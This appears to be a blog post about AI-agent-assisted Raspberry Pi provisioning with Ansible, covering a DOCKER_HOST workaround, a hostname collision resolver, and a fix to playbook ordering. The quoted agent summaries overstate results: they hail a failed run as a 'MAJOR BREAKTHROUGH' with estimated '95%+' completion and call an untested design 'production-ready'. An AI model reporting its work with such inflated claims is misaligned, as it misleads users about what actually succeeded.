  1. When running from the host OS, we lose the $DOCKER_HOST variable. Recall: if we have the builder hotspot, the docker_host value is hardcoded to 10.6.6.1. If it’s running in the containers, they’re preconfigured to grab the hostname of the host OS running apt-cacher-ng container- and the playbook applies the hostname to the target devices apt repositories correctly. Since we’re implementing a 3rd solution- which is running the playbook from the Host OS, we need to manually pass the environment variable. Additionally, the root_playbook_dir is hardcoded to be /home/pi/Playbooks/yadda yada. These two tasks can be achieved with the following command:
    DOCKER_HOST=captainmccrank.local ansible-playbook -i inventory run.yml -e “root_playbook_dir=$(pwd)” -vv
  2. The agent performed very well. The Agent’s summary of the deliverables is as follows:

## Achievement Summary

**MAJOR BREAKTHROUGH**: Successfully completed 95%+ of the Instant Community WiFi Portal deployment using host system approach with proper environment variable configuration. This represents the **furthest successful deployment progress** achieved to date.

**Impact**: Critical – Proved host system deployment viability and documented complete infrastructure success

**Severity**: Late-stage failure after major system completion

**Environment**: Host system deployment with corrected DOCKER_HOST and path variables

## Deployment Success Metrics

### **Quantitative Success:**

**Previous attempts**: Failed at tasks 3-4 (APT repository failures)

**This session**: Reached final cleanup phase (`roles/system/tasks/final_cleanup.yml`)

**Estimated completion**: 95%+ of all deployment tasks completed successfully

**Package installations**: 247+ development packages, WiFi drivers, SSL certificates

**System reboots**: Multiple successful reboots with automatic reconnection

**Validation tests**: All critical infrastructure tests **PASSING**

### **Infrastructure Achievements:**

**APT Repository System**: Perfect operation through apt-cacher-ng server

**Development Environment**: Complete build toolchain installation

**WiFi Hardware**: 8812au drivers compiled, installed, and activated

**Network Architecture**: NetworkManager + dnsmasq + nodogsplash properly configured

**SSL Infrastructure**: Certificates generated (snakeoil, nginx, certbot integration)

**Service Dependencies**: All critical service relationships established correctly

Agent Driven Software Troubleshooting

Welp- I experienced an unanticipated error in nodogsplash on a build:
This is an ansible-playbook installation task screenshot showing the compilation error.

So I sent my agent after it. I fed a claude session with a troubleshooting prompt and directed it to review the source code in the directory and gave it permission to ssh into a the recipient image that was failing:

Cool to see my “AgentLessonsLearned” concept being explored. See this to get context on AgentLessonsLearned.

and then the agent made progress on identifying the root cause:

The agent tries to make a fix:

And now I validated that the fix works!

I resumed the build and the issue was fixed!


What does this mean?

  • I don’t have to parse difficult to read error messages to figure out the source of the problem.
  • I don’t have to do google searches to troubleshoot exotic errors.
  • I get a document that tells me what problems were experienced, how they were diagnosed and how they were fixed. I get the lessons learned without the work.
  • I feel like I’m a little further up on the productivity asymptote.
  • Protoypes that used to take me over a month are done in a couple days.

Is this cool to you? Connect with me on twitter (@patrickmccanna) with a project proposal for a raspberry pi. Feel free to add hardware like the pi sense hat or the Inky hat. Let’s see how quickly I can turn user requirements into a working prototype!

Raspberry Pi Hostname Collision Resolver

Situation

When deploying multiple Raspberry Pi devices from the same firmware image for Ansible automation, hostname conflicts create operational challenges. While RFC 6762 specifies that mDNS devices should automatically resolve naming collisions by incrementing the duplicate name with a -2/3/4/etc postfix, real-world implementations often fail. Pinging ansibledest.local often returns competing results when multiple pis are online. This leaves devices unreachable with duplicate hostnames like ansibledest.local. This makes Ansible playbooks unable to identify and manage devices reliably.

Task

I will develop an automated solution that:

  • Proactively resolves hostname conflicts before they impact operations
  • Runs automatically on first boot without manual intervention
  • Scales to simultaneous deployment of multiple devices
  • Provides comprehensive audit logging for network discovery
  • Integrates seamlessly with existing Ansible automation workflows

Action

I created a comprehensive hostname collision resolver system consisting of:

Core Components

  1. hostname-collision-resolver.sh – Main script that:
    • Waits for network interfaces (wlan0/eth0) to be ready
    • Adds random delay (10-40 seconds) to prevent simultaneous boot conflicts
    • Scans network using avahi-browse and ping for existing hostname variants
    • Uses gap-filling algorithm to find lowest available hostname number
    • Updates system hostname and configuration files
    • Logs detailed network state including IP/MAC addresses of discovered hosts
    • Reboots automatically if hostname changes are made
  2. hostname-collision-resolver.service – Systemd service for proper boot integration:
    • Runs after network services are online
    • Executes before Ansible automation services
    • Configured as one-time execution with comprehensive logging
  3. firstrun.sh – Bootstrap script for SD card deployment:
    • Installs required packages (avahi-utils, avahi-daemon)
    • Embeds and installs the hostname resolver
    • Enables services for automatic execution
    • Self-removes after completion

Deployment Strategy

  • Embedded the entire hostname resolver system into a single firstrun.sh script
  • Used Raspberry Pi Imager advanced options for base configuration
  • Copied firstrun.sh to boot partition with proper permissions (chmod +x, chown root:root)
  • Created master SD card image ready for mass duplication via drive cloner

Key Features Implemented

  • Network-aware startup: Waits for actual network connectivity, not just interface up
  • Collision prevention: Random delays handle simultaneous device deployments
  • Intelligent naming: Gap-filling algorithm finds lowest available hostname variant
  • Comprehensive logging: Permanent audit trail of network state and decisions
  • One-time execution: Flag file prevents repeated runs throughout device lifetime
  • Automatic integration: Ready for immediate Ansible automation post-boot

Result

Successfully created a production-ready solution ready for testing. Should deliver the following results:

Immediate Outcomes

  • Master image ready: SD card contains fully integrated hostname resolver system
  • Scalable deployment: Ready for drive cloner to create multiple identical cards
  • Zero-touch automation: Devices will automatically resolve hostname conflicts on first boot
  • Ansible-ready: Devices will be immediately discoverable for automation after hostname resolution

Technical Achievements

  • Robust conflict detection: Uses both mDNS discovery and ping verification
  • Intelligent numbering: Finds optimal hostname (e.g., picks device-2.local if device-1.local and device-4.local exist)
  • Comprehensive logging: Complete audit trail including network topology at boot time
  • Production hardening: Error handling, timeouts, and safety mechanisms throughout

Next Steps Enabled

  1. Use drive cloner to duplicate master SD card to multiple cards
  2. Deploy cards to Raspberry Pi devices simultaneously
  3. Power on devices – automatic hostname resolution occurs
  4. Run Ansible discovery to locate renamed devices
  5. Proceed with normal Ansible automation workflows

The solution transforms a manual, error-prone process into a fully automated system that scales from single devices to large deployments while maintaining complete operational visibility.

I did write a testplan.md file that’s more detailed with test steps.

Fixing problems with playbook execution order that caused orphaning of target devices:

✅ Problem Fixed! Hostname Timing Issue Resolved

What Was Wrong:

  • Hostname change happened in final_cleanup.yml (middle of system role)
  • cloudflare_tunnel and selfie_app roles ran AFTER system role
  • They expected the new hostname but system still had old hostname
  • This caused the “hostname transition problem” documented in CLAUDE.md

Solution Implemented:

  • Moved hostname changes to post_tasks in run.yml

New execution order:

  1. system role (no hostname change)
  2. cloudflare_tunnel role
  3. selfie_app role
  4. post_tasks: Set final hostname ← NOW HAPPENS LAST

Benefits:

  • cloudflare_tunnel and selfie_app configure with {{ hostname }} variable

  • Actual hostname change happens AFTER all roles complete

  • Clean transition from ansibledest.local → thepub.localNo orphaning – roles get configured properly before hostname switches

  • Resume Point: You can now resume as with –tags final_hostname_change to run just the hostname changes, or continue normally knowing the execution order is correct.

The hostname transition issue that’s been causing problems is now properly sequenced!

Key lessons:

Key Takeaways:

The Run.yml file is the ultimate arbiter of execution.

  • It calls the “system” role, the “cloudflare” tunnel role and the “seflie app” role. it then has “post_tasks” that handle the brittle commands that change the state of the device.
  • The system roll has all of the individual tasks in /roles/system/tasks whose order is controlled by main.yml in there.